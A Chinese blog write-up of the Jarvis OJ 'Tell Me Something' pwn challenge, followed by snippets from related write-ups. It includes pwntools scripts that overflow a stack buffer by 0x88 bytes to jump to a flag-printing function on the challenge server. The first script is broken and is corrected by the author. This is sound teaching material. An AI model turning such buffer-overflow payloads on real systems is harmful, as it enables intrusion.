[Jarvis OJ - PWN]——Tell Me Something

最新推荐文章于 2022-11-07 22:43:21 发布
最新推荐文章于 2022-11-07 22:43:21 发布
阅读量283 收藏
点赞数 1
分类专栏: # Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113539067
版权

[Jarvis OJ - PWN]——Tell Me Something

  • 题目地址:https://www.jarvisoj.com/challenges
  • 题目:
    在这里插入图片描述
    还是先checksec一下,64位开启了NX保护
    在这里插入图片描述
    IDA:看看,发现了可以利用的栈溢出函数read,第一个参数为0。代表标准读入,距离ebp的距离为0x88
    在这里插入图片描述
    找到可以打印flag的函数good_game和地址。可以作为覆盖的返回地址0x400620在这里插入图片描述在这里插入图片描述
    所以expolit为
from pwn import *
p = remote("pwn.jarvisoj.com",9876)
ret = 0x00400620
payload = 'a'*0x88 + 0x8) + p64(ret)
p.sendline(payload)
p.recvline()
p.interactive()

可是没想到不可以竟然失败了。仔细看了下发现v4没有ebp。什么鬼,孩子还是第一次碰到!!!不过以后可以长长记性了。
在这里插入图片描述

所以expolit为

from pwn import *
p = remote("pwn.jarvisoj.com",9876)
ret = 0x00400620
payload = 'a'*0x88+ p64(ret)
p.sendline(payload)
p.recvline()
p.interactive()

如果有帮助,可以支持一下孩子哦 😃

Y-peak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_tell_me_something
m0sway的博客
11-23 425
jarvisoj_tell_me_something 使用checksec查看: 看来又是一道栈溢出的题目,直接放IDA查看: 一眼看过去,main()函数中就已经存在栈溢出了 查看字符串可以发现,存在一个flag.txt的字符串,跟进函数查看: 这个函数读取并打印了flag,so…我们只需要return到这个函数即可 需要注意的是: 函数起始的时候并没有将rbp压入栈中,结束的时候也没有leave 所以我们在ret的时候不需要加上偏移,直接在0x88后面加上要ret的函数的地址 exp: from
Jarvis OJ Tell Me Something
九层台
04-05 566
nc pwn.jarvisoj.com 9876 题目网址 https://www.jarvisoj.com/challenges 需要原料: python zio模块。 拿到程序名字太长了,改名成 1 用file命令查看文件类型 file 1 1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically...
(Jarvis Oj)(Pwn) Tell Me Something
Nothing
06-14 984
(Jarvis Oj)(Pwn) Tell Me Something 首先查看程序开的保护。基本什么都没有。 丢到ida中,主函数。 然后发现了good_game函数。 这个函数的用途就显而易见了,输出目录下的”flag.txt”文件。于是利用read函数导致的栈溢出,将返回地址覆盖为good_game函数的地址。通过ida或者cyclic工具可以获得需要的填充的长度。写得脚本...
BUUCTF:jarvisoj_tell_me_something(write up)
qq_44768749的博客
08-24 442
BUUCTF:jarvisoj_tell_me_something0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 仅开启了栈不可执行保护 0x02 运行 只是输入一条message 0x03 IDA good_game函数将flag.txt内容输出 0x04 思路 是一道简单的栈溢出题,知道覆盖长度即可,gdb调试 发现输入message的地址到返回地址的长度为0x88字节 0x05 exp #!/usr/bin/python
jarvisoj——Tell Me Something
王嘟嘟的博客
07-14 538
本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。 题目 Wp 这里首先下载,然后ida打开,看到main函数 main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。 然后这里可以看到有一个good_gaem 可以看到是读取了一个flag.txt的文件。 那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。 最后就是先覆盖136的自身,然后加上good_game的地址即可。 pwntools fro
JarvisAlgorithm:Jarvis算法-Java
03-06
Jarvis算法,又称礼品包装算法,是计算几何领域中用于寻找给定点集的凸包的经典算法。这个算法由Marvin Jarvis于1973年提出,主要用于处理二维空间中的点集问题。在Java编程语言中,我们可以实现这个算法来创建一个...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
JARVIS--AI-Based-Assistant:简单的JARVIS语音助手
04-06
**JARVIS--AI-Based-Assistant: 简单的JARVIS语音助手** JARVIS,这个名字来源于漫威电影中的贾维斯人工智能系统,现在我们将其应用到一个基于AI的语音助手中。这个项目主要使用Python编程语言来实现,为用户提供了...
jarvisoj_tell_me_something【BUUCTF】
qq_41696518的博客
09-03 186
那就很简单了,溢出指向漏洞函数即可,但此题有个小坑,其实最开始学pwn时会通过gdb查找溢出大小,但后面懒了就直接通过IDA查看,但IDA并不一定准确,并且题目本身也会有坑,比如该题。但本题,main函数没有push ebp的操作,所有溢出时不需要多加8字节ebp位置。
[BUUCTF]PWN——jarvisoj_tell_me_something
mcmuyanga的博客
11-02 269
jarvisoj_tell_me_something 附件 步骤: 例行检查,64位程序,开启了NX保护 运行一下程序,看看程序的大概流程 64位ida载入,shift+f12检索程序里的字符串 看到了flag.txt关键子,双击跟进,找到了程序里的后门,flag_addr=0x400620 从main函数开始看程序 输入点的v4明显的溢出漏洞,利用它覆盖返回地址为flag_addr的地址读出flag 这边有一个注意点 看汇编发现这个程序的结尾处跟平常函数的结尾不一样没有leave 这道题
BUUCTF-jarvisoj_tell_me_something
最新发布
Rt1Text的博客
11-07 108
read有栈溢出flag.txt进行栈溢出将返回地址覆盖为fopen函数地址。
Buuctf(pwn) jarvisoj_tell_me_something 栈溢出
半岛铁盒的博客
08-15 155
64位程序,开启了NX保护 400620 from pwn import * r=remote('node4.buuoj.cn',29273) flag_addr=0x400620 payload='a'*(0x88)+p64(flag_addr) r.sendline(payload) r.interactive() 这道题需要注意的一点是没有返回 这是其栈结构 所以这道题直接溢出0x88即可 ...
buuctf pwn wp(第1.5波)学会用ELF语句进行AAAA(即本地做题目)
月阴荒的博客
03-24 560
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
Jarvis oj tell me something writeup
ditto的博客
12-31 257
拿到题目前checksec下: 64位,开启了NX。 放到IDA里看下: 就单纯的栈溢出,看下调用哪些函数: plt表里并没有system函数,也不知道对方使用的动态库的版本。 看到函数good_game: 这个函数会读取flag,那么就很显然了,将返回地址覆盖到这个函数即可。 计算下溢出点: 由于是64位的程序,不能访问大于0x00007fffffffffff的地址空间。 但是可以通...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值